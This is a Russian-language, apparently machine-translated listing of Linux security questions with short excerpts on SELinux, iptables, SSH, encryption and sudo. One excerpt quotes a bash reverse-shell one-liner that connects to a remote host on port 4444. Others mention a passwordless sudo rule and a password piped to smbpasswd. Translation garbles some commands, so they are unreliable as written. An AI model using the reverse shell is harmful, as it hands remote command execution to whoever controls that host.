Вопросы Теги
Все вопросы "security"
2
ответа

SELinux блокирует веб-приложение Tomcat для загрузки собственной библиотеки Java (JNI) из папки / tmp

У меня есть Centos 7 с установленным Tomcat и пользователь tomcat ls -l / var / lib / tomcat всего 0 drwxrwxrwx. 5 root tomcat 84 3 июля 13:18 webapps SELinux применяет принудительное исполнение и веб-приложение Java, которое пытается ...
03.07.2018
2
ответа

Как узнать, был ли USB подключен в определенную дату? (Linux / Mac)

Начиная с этого замечательного сценария, предложенного Даниэлем Азуелосом cd / Volumes / suspicious_USB / usr / bin / sudo find. -atime -21 -exec ls -dluT {} \; Как можно изменить его, чтобы узнать, подключен ли USB-накопитель ...
19.05.2018
2
ответа

Опасно ли запускать эхо без кавычек?

Я видел пару похожих тем, но они относятся к переменным без кавычек, что, как я знаю, может привести к нежелательным результатам. Я видел этот код и задавался вопросом, можно ли ввести ...
17.05.2018
2
ответа

блокировать скрипт sudo

Мне не нравится вводить пароль для sudo, поэтому я отключил его с помощью% sudo ALL = (ALL) NOPASSWD: ALL Теперь у меня плохая сторона эффект, что любой сценарий оболочки, который я запускаю, может незаметно выполнять sudo от моего имени. ...
10.05.2018
2
ответа

Возможный обходной путь inotifywait не может производить вывод с разделителями NUL

В настоящее время я пишу сценарий bash, который использует inotifywait для выполнения определенных действий с пользовательским списком файлов и каталогов. Мне стало известно, что в отличие от многих инструментов оболочки, ...
08.05.2018
2
ответа

iptables conntrack модуль: SNAT (или DNAT) состояние вместо ESTABLISHED/RELATED?

В течение некоторого времени (введено в версию 1.3, на мой взгляд), модуль iptables может отслеживать два виртуальных состояния, SNAT и DNAT: SNAT Виртуальное состояние, совпадающее, если исходный адрес источника отличается ...
07.05.2018
2
ответа

В чем разница между / etc / ssh / и ~ / .ssh?

Мне нравится OpenSSH, и я знаю, что каталог / etc / ssh предназначен для демона ssh и ~ / .ssh каталог предназначен для конкретного пользователя. Оба каталога содержат закрытые и открытые ключи: Но что ...
29.04.2018
2
ответа

Поддержание целостности раздела / boot

Я заинтересован в настройке моего компьютера с полным шифрованием диска, и, как я понимаю, раздел / boot - единственная сложная часть процесса. А именно, я могу зашифровать раздел / boot и ...
25.04.2018
2
ответа

стоимость слабого пароля для однопользовательского рабочего стола [закрыто]

Предположим, я установил в качестве пароля что-то очень простое, например букву «а», так что все, у кого есть доступ к приглашению на вход, фактически имеет root-доступ. Какие атаки меня это открывает, как ...
02.03.2018
2
ответа

как проверить, остановлен ли брандмауэр на redhat 7

Какой элегантный способ проверить, остановлен/неактивен ли брандмауэр на компьютерах с redhat 7? пример: мы останавливаем брандмауэр: systemctl status firewalld.service и мой подход к проверке брандмауэра ...
02.11.2017
2
ответа

rkhunter выдает предупреждение для "/usr/bin/lwp-request" - что мне делать? [Debian 9]

Итак, я только что установил и запустил rkhunter, который показывает мне зеленые OKs / Not founds для всего, кроме: /usr/bin/lwp-request, например: /usr/bin/lwp-request [ Warning ...
12.10.2017
2
ответа

Linux - отображать или обновлять обновления безопасности только с помощью apt

есть ли способ перечислить или установить обновления безопасности только с помощью apt ? если я перечисляю обновления с помощью: apt list --upgradable, могу ли я видеть, не зная пакетов и библиотек, какие обновления актуальны ...
09.10.2017
2
ответа

Есть ли надежный способ заставить несколько учетных записей пользователей вести себя как root, кроме sudo?

Я и мой друг администрируем изрядное количество виртуальных машин, каждая из которых предназначена для выполнения некоторой задачи в общей системе. Когда нам нужно их администрировать, мы обычно входим в систему как root, поскольку ...
14.08.2017
2
ответа

Вопрос анонимности сети

При использовании Linux, я проводил некоторые исследования по анонимизации моего трафика с помощью различных инструментов. Однако меня немного смущают все инструменты, которые мне следует использовать. Вот некоторые из них, которые я сейчас использую: .
16.07.2017
2
ответа

Создать зашифрованное USB-хранилище

Как я могу создать зашифрованное USB-устройство хранения данных, к которому можно будет получить доступ в любой системе, если оно создано в Linux, с использованием cryptsetup, dm-crypt или подобных программ которые могут создавать зашифрованные контейнер
01.06.2017
2
ответа

Автоматические обновления системы защиты на Debian сжимают сервер

Для производства Debian сжимают сервер, каковы лучшие практики или рекомендации для обработки обновлений системы защиты? Я видел различные статьи о способном к крону, apticron, необслуживаемых обновлениях, способном кроне...
31.05.2017
2
ответа

Действительно ли переменные среды видимы непривилегированным пользователям на Linux?

Я пытаюсь определить, заметны ли в Linux переменные среды для процесса другими (некорневыми) пользователями. Непосредственный вариант использования помещает секреты в переменные среды. Это...
23.05.2017
2
ответа

Сценарий пароля самбы, но безопасно

Я хочу добавить скрипт для пользователя самбы и пароля. Я видел решения, аналогичные приведенному здесь. Передача пароля по конвейеру для smbpasswd echo -ne "$ PASS \ n $ PASS \ n" | smbpasswd -a -s $ LOGIN, но ...
23.05.2017
2
ответа

Как работает перенаправление этой команды?

Я провожу небольшое исследование безопасности, и я был интересно, как следующий фрагмент работает в ОС на базе Unix: exec 5 <> / dev / tcp / 192.168.159.150 / 4444; кот <& 5 | пока читаем строку; do \ $ line 2> ...
22.05.2017
2
ответа

подозрительная активность на сервере?

У меня есть удаленный сервер, и я получил электронное письмо о 90% потреблении полосы пропускания использование. Итак, я зашел на сервер, проверил и заметил, что на сервере запущен gnome-terminal, которого у меня нет ...
15.05.2017
2
ответа

pfsense: блокировка второго DHCP-сервера

В моей локальной сети я использую сервер PFSense с одним DHCP-сервером. Мне нужно заблокировать второй DHCP-сервер, появляющийся в моей локальной сети. Я думаю, что могу использовать брандмауэр PfSense для запрета IP-адреса второго DHCP-сервера...
15.05.2017
2
ответа

Является ли os-prober угрозой безопасности?

Я провожу аудит безопасности и наткнулся на эту утилиту, работающую в моей системе Debian. (Debian 3.16.36-1 + deb8u1) Мне кажется, что подобное программное обеспечение не следует устанавливать на ...
04.05.2017
2
ответа

Понимание getlogin ()

Я думаю, что предыдущее повторение этого вопроса было немного похоже на ковровую бомбу вопросов, так, чтобы, возможно, выключил людей к нему (на грани того, чтобы почти быть отмеченным для удаления), таким образом, я буду...
13.04.2017
2
ответа

Как добавить стороннее репо. и ключ в Debian?

Я рассмотрел другой аналогичный вопрос о добавлении сторонних репозиториев. Я пытаюсь добавить сторонний клиент обмена мгновенными сообщениями для настольных ПК под названием riot. Хотя сайт дает ссылку на сторонний сайт, он не дает ...
13.04.2017
2
ответа

IPTables - Разрешить перенаправление портов Docker только для определенного IP-адреса

Я размещаю веб-приложение на Ubuntu 16.04. Все компоненты этого приложения находятся внутри контейнеров Docker, большинство из них должны общаться только между собой, но не с внешним миром (например, PostgreSQL ...
13.04.2017
2
ответа

Как добавить правила в исходную таблицу iptables?

Я работаю над Linux Mint 18.1 и GNU / Linux Debian 9 Stretch (тестирование). У меня доступен только IPv4. Я хотел бы повысить безопасность своей сети, я прочитал это: «Блокировать известные TCP-атаки». ...
07.04.2017
2
ответа

Защищен ли Vim от атак копирования и вставки?

Вы никогда не должны вставлять данные из Интернета в свой терминал. Вместо этого вы должны вставить в текстовый редактор, проверить команду и затем вставить в терминал. Это нормально, но что, если Vim - мой текстовый редактор? Может ...
04.04.2017
2
ответа

Предоставить временный доступ по SSH для поддержки

Я должен предоставить некоторую поддержку пользователям для определенного программного обеспечения. Поскольку оказание поддержки по электронной почте утомительно, я хотел бы получить временный доступ к учетной записи пользователя. Позвоните пользователю
31.03.2017
2
ответа

Что мне нужно для создания резервных копий в виде надежных и защищенных архивов?

Я делаю резервные копии своих файлов на внешний жесткий диск. Я хочу регулярно создавать резервные копии и защищать их на случай, если кто-то украдет мой внешний HDD. Я хотел бы сделать скрипты, которые будут создавать защищенные архивы резервных копий, с
19.03.2017
2
ответа

Безопасно ли подключаться к серверу с неверными (конфиденциальными) ключами ssh?

У меня нет файла конфигурации, и каждый хост, к которому я подключаюсь, кажется, что ssh просматривает все ключи, пока не найдет правильный. Безопасно ли отправлять ключ на хост, который потенциально ...
17.03.2017